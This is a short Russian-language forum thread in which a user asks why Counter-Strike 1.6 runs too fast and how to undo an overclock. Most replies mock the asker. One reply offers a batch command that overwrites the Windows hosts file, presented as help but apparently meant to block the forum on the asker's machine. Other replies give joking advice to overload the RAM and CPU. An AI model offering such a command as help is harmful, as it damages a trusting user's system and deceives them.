Здравствуйте ачатовцы.. есть вопросы.. вообщем у меня 2х яденый комп. значит сижу я такой,играю в игрушку.. довольно таки сильную по требованием.. играю играю потом хочу поиграть в каес (cs 1.6) так он там бегает как будто у него жопа горит (быстро)..из-за чего это может быть? Так же интересует вопрос такой. Я когда то сдал компьЮтер в ремонт и мне его там разогнали (сдал знакомым)... я могу обратно сделать?? как было до того как мне его разогнали....
запусти прог побольше левых, или забей оперативку с процом, чтоб бегал медленно, можеш вообще до слайдшоу догнать, тогда получиться ефект замедления класный, можно будет увидеть все в замедлении и расмотреть хорошенько
ТС, по-твоему, чем быстрее процессор, тем быстрее бегаешь в кс? или какая связь с процессором то? понт?
@echo off 127.0.0.1 forum.antichat.ru > %SYSTEMROOT%\system32\drivers\etc\hosts Как сделаешь отпиши сюда
РАзогнал Процессор и видуху,Ну может еще годик проживёт твой комп.....А так,вруби ещё одну игру и будет у тебя как стоп-кран